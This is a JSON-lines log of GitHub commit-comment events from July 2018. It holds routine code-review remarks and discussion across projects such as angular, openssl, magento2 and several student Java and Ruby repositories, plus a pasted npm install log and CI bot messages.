{"id":"8015876259","type":"CommitCommentEvent","actor":{"login":"tanji"},"repo":{"name":"signal18/replication-manager"},"payload":{"comment":{"id":29827650,"position":5,"line":5,"path":"graphite/og-rek/ogorek.go","commit_id":"f3dcf4b7875842cc1c5211543e361a8cde06ed74","created_at":"2018-07-25T11:33:15Z","updated_at":"2018-07-25T11:33:15Z","author_association":"COLLABORATOR","body":"Hi @navytux,\r\n\r\nThanks for the info, this probably happened because the lib isn't in the vendor subdir. I will fix it when possible."}},"created_at":"2018-07-25T11:33:15Z"}
{"id":"8015877078","type":"CommitCommentEvent","actor":{"login":"fwhem"},"repo":{"name":"bryantjopplin/platform_vendor_gapps_test"},"payload":{"comment":{"id":29827652,"position":null,"line":null,"path":null,"commit_id":"88c332b044c20265a70d44faf9a87a0596ee8008","created_at":"2018-07-25T11:33:26Z","updated_at":"2018-07-25T11:33:26Z","author_association":"CONTRIBUTOR","body":"perms and wiz solve the problem"}},"created_at":"2018-07-25T11:33:26Z"}
{"id":"8015887297","type":"CommitCommentEvent","actor":{"login":"zh-wj"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29827666,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T11:35:00Z","updated_at":"2018-07-25T11:35:00Z","author_association":"NONE","body":"我本地是node 6 取最新的包试试  有结果贴这里  如果方便的话你那边也可以打个新的包这边尝试下安装  可以直接邮件给我么  zhangwenjun@5iketang.com  不用非得发布"}},"created_at":"2018-07-25T11:35:00Z"}
{"id":"8015888681","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827669,"position":7,"line":51,"path":"packages/compiler-cli/src/ngcc/src/transform/package_transformer.ts","commit_id":"a4691cab0280ada60d77309f7bea64ceb3d74468","created_at":"2018-07-25T11:35:17Z","updated_at":"2018-07-25T11:35:17Z","author_association":"NONE","body":"I wonder if when we test this with real-world packages, where they might pull in some enormous require tree in node_modules we might get a significant drop in performance."}},"created_at":"2018-07-25T11:35:17Z"}
{"id":"8015896246","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827689,"position":8,"line":39,"path":"packages/compiler-cli/src/ngcc/src/host/esm5_host.ts","commit_id":"fc0fda6732146fa895cd1ff76c540bef4cc0da07","created_at":"2018-07-25T11:36:57Z","updated_at":"2018-07-25T11:36:57Z","author_association":"NONE","body":"Why this change? The super version looks for `ts.ClassDeclaration` types, which should never appear in ES5 code."}},"created_at":"2018-07-25T11:36:57Z"}
{"id":"8015897525","type":"CommitCommentEvent","actor":{"login":"trazyn"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29827692,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T11:37:15Z","updated_at":"2018-07-25T11:37:15Z","author_association":"OWNER","body":"克隆代码到本地\r\n```\r\nnpm i\r\nnpm run package-linux\r\n```\r\n就能自己打包，只是依赖安装国内会很慢吧"}},"created_at":"2018-07-25T11:37:15Z"}
{"id":"8015897583","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827693,"position":7,"line":51,"path":"packages/compiler-cli/src/ngcc/src/transform/package_transformer.ts","commit_id":"a4691cab0280ada60d77309f7bea64ceb3d74468","created_at":"2018-07-25T11:37:16Z","updated_at":"2018-07-25T11:37:16Z","author_association":"OWNER","body":"AFAICT, it only pulls in dependencies. And the dependency graph can't be much worse than the corresponding `.ts`graph, right?"}},"created_at":"2018-07-25T11:37:16Z"}
{"id":"8015897893","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29827695,"position":null,"line":null,"path":null,"commit_id":"4cb647024a13bca40f07e7138704e2b541a3d26c","created_at":"2018-07-25T11:37:20Z","updated_at":"2018-07-25T11:37:20Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-315](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-315).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-315-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-25T11:37:20Z"}
{"id":"8015898680","type":"CommitCommentEvent","actor":{"login":"AnnieYousar"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29827697,"position":null,"line":null,"path":null,"commit_id":"7953d3e31b048478ca56bd1239ccf00dd09dbbbe","created_at":"2018-07-25T11:37:30Z","updated_at":"2018-07-25T11:37:30Z","author_association":"NONE","body":"For CHANGES  \r\nReplace\r\n```\r\n+     being prime depends on the inteded use based on the size. For larger\r\n+     primes this will result in more rounds of Miller-Rabin.\r\n```\r\nby\r\n```\r\n+     being prime depends on the intended use based on the size of the input.\r\n+     For larger primes this will result in more rounds of Miller-Rabin. \r\n+     The maximal error rate for primes with more than 1080 bits is lowered \r\n+     to 2^-128. \r\n```\r\nThis explains better the reason for this change (and corrects a misspelling ;-))."}},"created_at":"2018-07-25T11:37:30Z"}
{"id":"8015898967","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827698,"position":19,"line":48,"path":"packages/compiler-cli/src/ngcc/src/host/esm5_host.ts","commit_id":"fc0fda6732146fa895cd1ff76c540bef4cc0da07","created_at":"2018-07-25T11:37:34Z","updated_at":"2018-07-25T11:37:34Z","author_association":"NONE","body":"oh"}},"created_at":"2018-07-25T11:37:34Z"}
{"id":"8015900708","type":"CommitCommentEvent","actor":{"login":"agata-maksymiuk"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29827700,"position":7,"line":37,"path":"app/code/Magento/Checkout/Controller/Index/Index.php","commit_id":"a6f146cd9302fbbb6305df9613c7ce3eea7a05ae","created_at":"2018-07-25T11:37:55Z","updated_at":"2018-07-25T11:37:55Z","author_association":"NONE","body":"Is it really neccessary?\r\nShouldn't we just remove line 35 which seems completely unneccessary and causes bugs - and all be fine?"}},"created_at":"2018-07-25T11:37:55Z"}
{"id":"8015902985","type":"CommitCommentEvent","actor":{"login":"navytux"},"repo":{"name":"signal18/replication-manager"},"payload":{"comment":{"id":29827705,"position":5,"line":5,"path":"graphite/og-rek/ogorek.go","commit_id":"f3dcf4b7875842cc1c5211543e361a8cde06ed74","created_at":"2018-07-25T11:38:26Z","updated_at":"2018-07-25T11:38:26Z","author_association":"NONE","body":"hi @tanji, thanks for feedback. I understand it was all scripted and that's probably why it landed up there. FYI replication-manager has 2 copies of og-rek already: 1 inside vendor/ and 1 in graphite/. It seems the best way forward is to leave only one version - the one in vendor/. Probably the same applies to lots of other code in `graphite/`.\r\n\r\nThanks for plannig to fix it up. Please do not delay the fix indefinitely.\r\n\r\nKirill"}},"created_at":"2018-07-25T11:38:26Z"}
{"id":"8015906137","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29827712,"position":null,"line":null,"path":null,"commit_id":"f94ad1c325ee7acaf1379a763db894b61277b5c3","created_at":"2018-07-25T11:39:11Z","updated_at":"2018-07-25T11:39:11Z","author_association":"NONE","body":"im not hang or maybe need on some height?"}},"created_at":"2018-07-25T11:39:11Z"}
{"id":"8015906462","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29827714,"position":null,"line":null,"path":null,"commit_id":"f354740abc3c6445c6f0ed8d62f10f3fc84386a3","created_at":"2018-07-25T11:39:15Z","updated_at":"2018-07-25T11:39:15Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-25T11:39:15Z"}
{"id":"8015908346","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827719,"position":8,"line":39,"path":"packages/compiler-cli/src/ngcc/src/host/esm5_host.ts","commit_id":"fc0fda6732146fa895cd1ff76c540bef4cc0da07","created_at":"2018-07-25T11:39:40Z","updated_at":"2018-07-25T11:39:40Z","author_association":"OWNER","body":"Apparently, `node` can be from a declaration file. `getClassSymbol()` is probably enough (since it calls `super.getClassSymbol()`), but added this here too for consistency."}},"created_at":"2018-07-25T11:39:40Z"}
{"id":"8015908348","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827718,"position":30,"line":185,"path":"packages/compiler-cli/src/ngtsc/annotations/src/ng_module.ts","commit_id":"3c2cce28b621197b6ef579860c0f8720fadc3eec","created_at":"2018-07-25T11:39:40Z","updated_at":"2018-07-25T11:39:40Z","author_association":"NONE","body":"I think it is cleaner to simply move this function into the class as a private method, then this.reflector is avaialble."}},"created_at":"2018-07-25T11:39:40Z"}
{"id":"8015910971","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827726,"position":30,"line":121,"path":"packages/compiler-cli/test/ngcc/ngcc_spec.ts","commit_id":"3c2cce28b621197b6ef579860c0f8720fadc3eec","created_at":"2018-07-25T11:40:14Z","updated_at":"2018-07-25T11:40:14Z","author_association":"NONE","body":"👀 "}},"created_at":"2018-07-25T11:40:14Z"}
{"id":"8015913059","type":"CommitCommentEvent","actor":{"login":"guysoft"},"repo":{"name":"raspberrypi/linux"},"payload":{"comment":{"id":29827729,"position":null,"line":null,"path":null,"commit_id":"0d118e31780349beb5ffa1777fd77058cc464ad6","created_at":"2018-07-25T11:40:39Z","updated_at":"2018-07-25T11:40:39Z","author_association":"NONE","body":"@pelwell \r\n\r\n> If you want to publicise your service, start a topic in the Advanced Users forum.\r\n\r\nFinally got to posting here:\r\nhttps://www.raspberrypi.org/forums/viewtopic.php?f=29&t=218939"}},"created_at":"2018-07-25T11:40:39Z"}
{"id":"8015913842","type":"CommitCommentEvent","actor":{"login":"cronos2"},"repo":{"name":"jccriado/matchingtools"},"payload":{"comment":{"id":29827731,"position":107,"line":223,"path":"matchingtools/core.py","commit_id":"beb61694a3fbd6cde3852b58b4ea6e14a212e095","created_at":"2018-07-25T11:40:49Z","updated_at":"2018-07-25T11:40:49Z","author_association":"COLLABORATOR","body":"This should be `diff.derivatives_indices.append(index)` amirite"}},"created_at":"2018-07-25T11:40:49Z"}
{"id":"8015916803","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29827737,"position":7,"line":24,"path":"E03/E4/src/e4_16/E4_16.java","commit_id":"c86fc821bcd454367c0b2107ad52a64fe82ab026","created_at":"2018-07-25T11:41:27Z","updated_at":"2018-07-25T11:41:27Z","author_association":"COLLABORATOR","body":"柴田\r\n連携しておらずすみません。\r\n定数は「すべて大文字のスネークケース」でお願いします。\r\n今回の場合、NEW_LINE_VALUE となります。"}},"created_at":"2018-07-25T11:41:27Z"}
{"id":"8015921402","type":"CommitCommentEvent","actor":{"login":"CatGirlsAreLife"},"repo":{"name":"Elskom/Els_kom_new"},"payload":{"comment":{"id":29827750,"position":null,"line":null,"path":null,"commit_id":"0abd69f0856b97ee7715f6ac91120fac80972511","created_at":"2018-07-25T11:42:29Z","updated_at":"2018-07-25T11:42:29Z","author_association":"CONTRIBUTOR","body":"@Kimeryo, @dc1284933037, @Timeffect0, @twoxzi sorry for the mentions but letting you guys know that your forks are out of date. Also if you guys like you can implement #87 which would be a cool thing to add since the plugin interface. You can do the designer of the user Control and form itself, I can fill in the actual code (I cannot open visual studio on a iPhone to do it myself currently)."}},"created_at":"2018-07-25T11:42:29Z"}
{"id":"8015921810","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29827752,"position":null,"line":null,"path":null,"commit_id":"f354740abc3c6445c6f0ed8d62f10f3fc84386a3","created_at":"2018-07-25T11:42:34Z","updated_at":"2018-07-25T11:42:34Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-25T11:42:34Z"}
{"id":"8015926286","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29827759,"position":null,"line":null,"path":null,"commit_id":"f5652f8e576bf6ce1a0be47dca96248f29ff6a0a","created_at":"2018-07-25T11:43:36Z","updated_at":"2018-07-25T11:43:36Z","author_association":"MEMBER","body":"ref: https://github.com/ant-design/ant-design/pull/11442"}},"created_at":"2018-07-25T11:43:36Z"}
{"id":"8015927646","type":"CommitCommentEvent","actor":{"login":"cronos2"},"repo":{"name":"jccriado/matchingtools"},"payload":{"comment":{"id":29827763,"position":18,"line":37,"path":"matchingtools/core.py","commit_id":"beb61694a3fbd6cde3852b58b4ea6e14a212e095","created_at":"2018-07-25T11:43:53Z","updated_at":"2018-07-25T11:43:53Z","author_association":"COLLABORATOR","body":"`Tensor.differentiate` does not work in-place but returns the result, so this method is just a rather inefficient version of the identity."}},"created_at":"2018-07-25T11:43:53Z"}
{"id":"8015930934","type":"CommitCommentEvent","actor":{"login":"EzPc1"},"repo":{"name":"EzPc1/website"},"payload":{"comment":{"id":29827771,"position":null,"line":null,"path":null,"commit_id":"f6ddc027c933e067487468f3c3c6a6f66cfbf766","created_at":"2018-07-25T11:44:35Z","updated_at":"2018-07-25T11:44:35Z","author_association":"OWNER","body":"need to purchase a domain first"}},"created_at":"2018-07-25T11:44:35Z"}
{"id":"8015931646","type":"CommitCommentEvent","actor":{"login":"mr-mayur"},"repo":{"name":"mr-mayur/PythonDatabaseDemo"},"payload":{"comment":{"id":29827772,"position":null,"line":null,"path":null,"commit_id":"e88c687c5bf0c2c18e06bde5ebed0d48c76d935f","created_at":"2018-07-25T11:44:44Z","updated_at":"2018-07-25T11:44:44Z","author_association":"OWNER","body":"Approved"}},"created_at":"2018-07-25T11:44:44Z"}
{"id":"8015933819","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827777,"position":7,"line":51,"path":"packages/compiler-cli/src/ngcc/src/transform/package_transformer.ts","commit_id":"a4691cab0280ada60d77309f7bea64ceb3d74468","created_at":"2018-07-25T11:45:14Z","updated_at":"2018-07-25T11:45:14Z","author_association":"NONE","body":"Except that normally the compiler will stop when it hits a JS file, so you\ncan import huge JS trees in a TS program without really bringing them in.\n\nOn Wed, 25 Jul 2018 at 12:37 George Kalpakas <notifications@github.com>\nwrote:\n\n> AFAICT, it only pulls in dependencies. And the dependency graph can't be\n> much worse than the corresponding .tsgraph, right?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gkalpak/angular/commit/a4691cab0280ada60d77309f7bea64ceb3d74468#commitcomment-29827693>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAA9JxMb4Jc9AE7G98Bt_nOVQiKS1Xvkks5uKFhsgaJpZM4Vf65v>\n> .\n>\n"}},"created_at":"2018-07-25T11:45:14Z"}
{"id":"8015936066","type":"CommitCommentEvent","actor":{"login":"zh-wj"},"repo":{"name":"trazyn/weweChat"},"payload":{"comment":{"id":29827781,"position":null,"line":null,"path":null,"commit_id":"6e10cbe7605a0a413b8b02d1bbc6a5f67f6efc09","created_at":"2018-07-25T11:45:44Z","updated_at":"2018-07-25T11:45:44Z","author_association":"NONE","body":"npm install && npm run package-linux    ???  \r\n\r\n\r\n\r\n\r\n国内git clone  速度肉的要死。    而且\r\n[zimo@zh weweChat-dev]$ whereis npm \r\nnpm: /usr/bin/npm /usr/local/bin/npm /usr/share/man/man1/npm.1.gz\r\n[zimo@zh weweChat-dev]$ npm -v \r\n3.10.10\r\n[zimo@zh weweChat-dev]$ /usr/local/bin/npm -v \r\n6.1.0\r\n[zimo@zh weweChat-dev]$ /usr/local/bin/npm  install \r\nnpm WARN deprecated babel-preset-es2015@6.24.1: 🙌  Thanks for using Babel: we recommend using babel-preset-env now: please read babeljs.io/env to update! \r\nnpm WARN deprecated postcss-cssnext@3.1.0: 'postcss-cssnext' has been deprecated in favor of 'postcss-preset-env'. Read more at https://moox.io/blog/deprecating-cssnext/\r\nnpm WARN deprecated browserslist@2.11.3: Browserslist 2 could fail on reading Browserslist >3.0 config used in other tools.\r\n\r\n\r\n> husky@0.14.3 install /home/zimo/Downloads/weweChat-dev/node_modules/husky\r\n> node ./bin/install.js\r\n\r\n\r\nhusky\r\nsetting up Git hooks\r\ncan't find .git directory, skipping Git hooks installation\r\n\r\n\r\n> electron@2.0.5 postinstall /home/zimo/Downloads/weweChat-dev/node_modules/electron\r\n> node install.js\r\n\r\n\r\nnpm notice created a lockfile as package-lock.json. You should commit this file.\r\nnpm WARN react-addons-css-transition-group@15.6.2 requires a peer of react@^15.4.2 but none is installed. You must install peer dependencies yourself.\r\nnpm WARN extract-text-webpack-plugin@3.0.2 requires a peer of webpack@^3.1.0 but none is installed. You must install peer dependencies yourself.\r\nnpm WARN ajv-keywords@3.2.0 requires a peer of ajv@^6.0.0 but none is installed. You must install peer dependencies yourself.\r\nnpm WARN optional SKIPPING OPTIONAL DEPENDENCY: fsevents@1.2.4 (node_modules/fsevents):\r\nnpm WARN notsup SKIPPING OPTIONAL DEPENDENCY: Unsupported platform for fsevents@1.2.4: wanted {\"os\":\"darwin\",\"arch\":\"any\"} (current: {\"os\":\"linux\",\"arch\":\"x64\"})\r\n\r\n\r\nadded 1605 packages from 925 contributors and audited 14249 packages in 79.734s\r\nfound 1 moderate severity vulnerability\r\n  run `npm audit fix` to fix them, or `npm audit` for details\r\n\r\n\r\n\r\n 心里有点略略的难受\r\n\r\n\r\n \r\n------------------ Original ------------------\r\nFrom:  \"trazyn\"<notifications@github.com>;\r\nDate:  Wed, Jul 25, 2018 07:37 PM\r\nTo:  \"trazyn/weweChat\"<weweChat@noreply.github.com>; \r\nCc:  \"Zimo\"<zhangwenjun@5iketang.com>; \"Mention\"<mention@noreply.github.com>; \r\nSubject:  Re: [trazyn/weweChat] Fix #150 #149 (6e10cbe)\r\n\r\n \r\n\r\n克隆代码到本地\r\n npm i npm run package-linux  \r\n就能自己打包，只是依赖安装国内会很慢吧\r\n \r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-25T11:45:44Z"}
{"id":"8015939698","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29827786,"position":19,"line":19,"path":"equation.rb","commit_id":"bd5382815e5711e1767235c17f867530afbd9673","created_at":"2018-07-25T11:46:33Z","updated_at":"2018-07-25T11:46:33Z","author_association":"NONE","body":"Эта строка не имеет смысла. Если у нас D не больше 0 и не равен 0, то во всех остальных случаях D будет меньше 0. И выполнение кода должно попасть в ветку else. То есть сейчас в этой строке проверяется, если D < 0 и получается, что если меньше, то сообщения из 21 22 строк не выведутся."}},"created_at":"2018-07-25T11:46:33Z"}
{"id":"8015940120","type":"CommitCommentEvent","actor":{"login":"tiero"},"repo":{"name":"vulpemventures/custodian-vault"},"payload":{"comment":{"id":29827788,"position":7,"line":19,"path":"README.md","commit_id":"606f0972743aee01f2f400ee1a7cff9824e048ff","created_at":"2018-07-25T11:46:39Z","updated_at":"2018-07-25T11:46:39Z","author_association":"MEMBER","body":"fix the typo svault"}},"created_at":"2018-07-25T11:46:39Z"}
{"id":"8015940596","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29827789,"position":7,"line":51,"path":"packages/compiler-cli/src/ngcc/src/transform/package_transformer.ts","commit_id":"a4691cab0280ada60d77309f7bea64ceb3d74468","created_at":"2018-07-25T11:46:46Z","updated_at":"2018-07-25T11:46:46Z","author_association":"OWNER","body":"Oh, interesting. I hadn't thought of that :confused:"}},"created_at":"2018-07-25T11:46:46Z"}
{"id":"8015943718","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29827800,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-25T11:47:27Z","updated_at":"2018-07-25T11:47:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T11:47:27Z"}
{"id":"8015944643","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29827803,"position":42,"line":42,"path":"E03/E4/src/e4_17/E4_17.java","commit_id":"09ebf4c3eb8884214b791e5b6a8fb41e0a0bfe39","created_at":"2018-07-25T11:47:40Z","updated_at":"2018-07-25T11:47:40Z","author_association":"COLLABORATOR","body":"柴田\r\nコメント内容：何をカウントしますか？\r\n併せて変数名も修正したほうが良いかもしれません。"}},"created_at":"2018-07-25T11:47:40Z"}
{"id":"8015946409","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29827807,"position":null,"line":null,"path":null,"commit_id":"c5e114ab1ad17816665ddc3e22afb2a41c68144a","created_at":"2018-07-25T11:48:03Z","updated_at":"2018-07-25T11:48:03Z","author_association":"OWNER","body":"@locutus2 \r\nOk, will do."}},"created_at":"2018-07-25T11:48:03Z"}
{"id":"8015952627","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29827819,"position":34,"line":34,"path":"E03/E4/src/e4_18/E4_18.java","commit_id":"f27bb53af7dfd5a59ab2c00af5673dba147b2155","created_at":"2018-07-25T11:49:25Z","updated_at":"2018-07-25T11:49:25Z","author_association":"COLLABORATOR","body":"柴田\r\nコメントが不正です。確認してください。\r\n下の行も同様"}},"created_at":"2018-07-25T11:49:25Z"}
{"id":"8015959540","type":"CommitCommentEvent","actor":{"login":"NanoNao"},"repo":{"name":"sonnenglas/amazon-mws-laravel"},"payload":{"comment":{"id":29827834,"position":null,"line":null,"path":null,"commit_id":"2fca783a9fa65c718da013b9130321c32aa414f2","created_at":"2018-07-25T11:50:55Z","updated_at":"2018-07-25T11:50:55Z","author_association":"NONE","body":"Thank you for this, why getMyFeesEstimate is not présent? 👍 "}},"created_at":"2018-07-25T11:50:55Z"}
{"id":"8015961020","type":"CommitCommentEvent","actor":{"login":"AnnieYousar"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29827835,"position":null,"line":null,"path":null,"commit_id":"7953d3e31b048478ca56bd1239ccf00dd09dbbbe","created_at":"2018-07-25T11:51:14Z","updated_at":"2018-07-25T11:51:14Z","author_association":"NONE","body":"For doc/man3/BN_generate_prime.pod I would propose also a more detailed description\r\n```\r\n  probabilistic primality test with B<nchecks> iterations. If\r\n  B<nchecks == BN_prime_checks>, a number of iterations is used that\r\n- yields a false positive rate of at most 2^-64 for random input.\r\n- The error rate depends on the size of the prime and goes down for bigger primes.\r\n+ yields a false positive rate of at most 2^-128 for primes with 1080 bits\r\n+ or more, and an error rate of at most 2^-80 for primes with at least 308 bits. \r\n```"}},"created_at":"2018-07-25T11:51:14Z"}
{"id":"8015961047","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29827836,"position":34,"line":34,"path":"E03/E4/src/e4_19/E4_19.java","commit_id":"3664876ea7e142f951dd23db23942ceea0ab9205","created_at":"2018-07-25T11:51:15Z","updated_at":"2018-07-25T11:51:15Z","author_association":"COLLABORATOR","body":"柴田\r\nマジックナンバーは排除してください。"}},"created_at":"2018-07-25T11:51:15Z"}
{"id":"8015963049","type":"CommitCommentEvent","actor":{"login":"tomchristie"},"repo":{"name":"encode/django-rest-framework"},"payload":{"comment":{"id":29827840,"position":null,"line":null,"path":null,"commit_id":"e5781440fa6ccff09abc6e0566bdfdd9b84a80a1","created_at":"2018-07-25T11:51:41Z","updated_at":"2018-07-25T11:51:41Z","author_association":"MEMBER","body":"Sure thing. Like most OSS projects we’re generally bottlenecked by maintainer attention, rather than contributors. Nothing easy to dive into on this atm. We’ll tend to comment on tickets if there’s a good way for contributors to help progress an issue."}},"created_at":"2018-07-25T11:51:41Z"}
{"id":"8015963428","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29827842,"position":12,"line":12,"path":"ideal-weight.rb","commit_id":"8c01f69d988e962b1920015ac364b79e4dc2ce7d","created_at":"2018-07-25T11:51:46Z","updated_at":"2018-07-25T11:51:46Z","author_association":"NONE","body":"Еще раз хочу обратить внимание, как работают if/elsif/else\r\n\r\nв else не пишется условие. Условие пишется для if, и elsif. В еlse выполнение кода зайдет только в случае, если не зашло ни в одно из предыдущих ветвлений.\r\n```\r\nif условие\r\n  # выполнится код, если \"условие\" вернет правдивое значение\r\nelsif другое_условие\r\n  # выполнится код, если \"другое_условие\" вернет правдивое значение\r\nelse\r\n  # код который выполнится, если ни \"условие\" ни \"другое_условие\" не выполнились\r\nend\r\n```\r\nСейчас в случае, если a < 0 ничего не произойдет. Если удалить 8 строку, то все будет работать верно"}},"created_at":"2018-07-25T11:51:46Z"}
{"id":"8015964191","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29827843,"position":11,"line":11,"path":"validate.py","commit_id":"f3cd217308ee6cec6d58e8e42f6965b8ad597419","created_at":"2018-07-25T11:51:56Z","updated_at":"2018-07-25T11:51:56Z","author_association":"NONE","body":"Your script should take the path to the \"cloudformation\" folder as an argument - don't hardocde this in"}},"created_at":"2018-07-25T11:51:56Z"}
{"id":"8015965290","type":"CommitCommentEvent","actor":{"login":"kroeckx"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29827844,"position":null,"line":null,"path":null,"commit_id":"7953d3e31b048478ca56bd1239ccf00dd09dbbbe","created_at":"2018-07-25T11:52:12Z","updated_at":"2018-07-25T11:52:12Z","author_association":"MEMBER","body":"I think I was faster\n"}},"created_at":"2018-07-25T11:52:12Z"}
{"id":"8015965327","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29827845,"position":11,"line":11,"path":"validate.py","commit_id":"f3cd217308ee6cec6d58e8e42f6965b8ad597419","created_at":"2018-07-25T11:52:13Z","updated_at":"2018-07-25T11:52:13Z","author_association":"NONE","body":"(use click to handle command line arguments)"}},"created_at":"2018-07-25T11:52:13Z"}
{"id":"8015967143","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29827847,"position":63,"line":63,"path":"E03/E4/src/e4_19/E4_19.java","commit_id":"3664876ea7e142f951dd23db23942ceea0ab9205","created_at":"2018-07-25T11:52:36Z","updated_at":"2018-07-25T11:52:36Z","author_association":"COLLABORATOR","body":"柴田\r\nこの値もマジックナンバーです。(教本にある通りの内容だと思いますが)"}},"created_at":"2018-07-25T11:52:36Z"}
{"id":"8015969653","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29827853,"position":8,"line":8,"path":"right-triagle.rb","commit_id":"078e0ba518964b526e9b6da43d69f867f952e28d","created_at":"2018-07-25T11:53:06Z","updated_at":"2018-07-25T11:53:06Z","author_association":"NONE","body":"В данном случае проверяется, что треугольник равносторонний"}},"created_at":"2018-07-25T11:53:06Z"}
{"id":"8015973597","type":"CommitCommentEvent","actor":{"login":"parzej"},"repo":{"name":"parzej/wilderness-api"},"payload":{"comment":{"id":29827862,"position":6,"line":6,"path":"server/api/common/sourceSchema.js","commit_id":"aad68a31fc651b4830a9d2ac9f010731dcaf8acb","created_at":"2018-07-25T11:53:58Z","updated_at":"2018-07-25T11:53:58Z","author_association":"OWNER","body":"Shouldn't it be an array of strings, just to reflect cases like: Prof. dr. hab."}},"created_at":"2018-07-25T11:53:58Z"}
{"id":"8015975399","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29827868,"position":34,"line":34,"path":"validate.py","commit_id":"f3cd217308ee6cec6d58e8e42f6965b8ad597419","created_at":"2018-07-25T11:54:22Z","updated_at":"2018-07-25T11:54:22Z","author_association":"NONE","body":"If there are errors, the script should exit with a non-zero code"}},"created_at":"2018-07-25T11:54:22Z"}
